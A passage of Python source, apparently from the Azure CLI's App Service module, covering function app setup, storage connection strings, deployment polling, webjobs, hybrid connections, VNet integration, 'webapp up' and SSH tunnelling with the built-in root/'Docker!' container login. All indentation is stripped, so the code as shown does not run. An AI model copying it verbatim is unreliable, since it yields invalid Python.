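# it assumes 'python' is a member of LINUX_RUNTIMES): creating a Linux consumption function app.
# --runtime is mandatory here because is_linux is True and no custom container image is given:
#     create_function(cmd, 'my-rg', 'my-func-app', 'mystorageacct',
#                     consumption_plan_location='westus', os_type='linux',
#                     runtime='python', functions_version='3')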
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_linux_fx_functionapp(functions_version, runtime, runtime_version):
if runtime == 'dotnet':
return runtime.upper()
if runtime_version is None:
runtime_version = FUNCTIONS_VERSION_TO_DEFAULT_RUNTIME_VERSION[functions_version][runtime]
return '{}|{}'.format(runtime.upper(), runtime_version)
def _get_website_node_version_functionapp(functions_version, runtime, runtime_version):
if runtime is None or runtime != 'node':
return FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION[functions_version]
if runtime_version is not None:
return '~{}'.format(runtime_version)
return FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION[functions_version]
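# Worked examples for the three helpers above (derived directly from their code paths):
#     _get_extension_version_functionapp('3')                   -> '~3'
#     _get_linux_fx_functionapp('2', 'dotnet', None)            -> 'DOTNET'
#     _get_linux_fx_functionapp('2', 'node', '10')              -> 'NODE|10'
#     _get_website_node_version_functionapp('2', 'node', '10')  -> '~10'
# When runtime_version is None, the defaults come from the FUNCTIONS_VERSION_TO_DEFAULT_*
# lookup tables referenced above.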
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # We emit this success message as a warning so it does not interfere with regular JSON output on stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
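# The resulting connection string has the shape (account name/key values are examples):
#     DefaultEndpointsProtocol=https;EndpointSuffix=<cloud storage suffix>;AccountName=mystorageacct;AccountKey=<key1>
# where the endpoint suffix comes from cli_ctx.cloud.suffixes.storage_endpoint
# (e.g. 'core.windows.net' for the public Azure cloud).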
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
time.sleep(2)
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log tail
-n {} -g {}""".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
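# Polling behaviour of _check_zip_deployment_status, as implemented above: the deployment status
# endpoint is polled repeatedly for up to `timeout / 2` trials (450 trials by default). A reported
# status of 3 is treated as a failed deployment (default logging is enabled and a CLIError is
# raised), a status of 4 as success, and anything else keeps the loop polling until the trial
# budget is exhausted, at which point a timeout CLIError is raised.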
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensures the input key type is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnet_id = ''
for v in list_all_vnets:
if v.name == vnet:
vnet_id = v.id
# parsing the arm uri in order to extract vnet_name and vnet_resource_group
vnet_id_strings = vnet_id.split('/')
vnet_resource_group = ''
i = 0
for z in vnet_id_strings:
if z.lower() == "resourcegroups":
vnet_resource_group = vnet_id_strings[i + 1]
i = i + 1
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
    # reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements,
launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_create_new_app = does_app_already_exist(cmd, name)
os_name = detect_os_form_src(src_dir, html)
lang_details = get_lang_from_content(src_dir, html)
language = lang_details.get('language')
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp %s already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app {}. Please check that the app is a part of "
"the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp {} exists in ResourceGroup {} and does not match the value entered {}. Please "
"re-run command with the correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered {} does not match the plan name that the webapp is hosted in {}."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
        # Raise an error if the OS of the existing app differs from the OS detected from the source
if current_os.lower() != os_name.lower():
raise CLIError("The webapp {} is a {} app. The code detected at '{}' will default to "
"'{}'. "
"Please create a new app to continue this operation.".format(name, current_os, src_dir, os))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("webapp %s doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_is_linux = os_name.lower() == 'linux'
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd, user, os_name, loc, sku, rg_name, _create_new_rg, plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we always call the ASP create-or-update API so that, in case of re-deployment,
    # any updated SKU or plan settings are applied
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=location)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None, tags={"cli": 'webapp_up'},
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
    else:  # for an existing app, we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file after deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
    # workaround until the Linux timeout limits issue is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify())
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.isAlive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.isAlive() and t.isAlive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
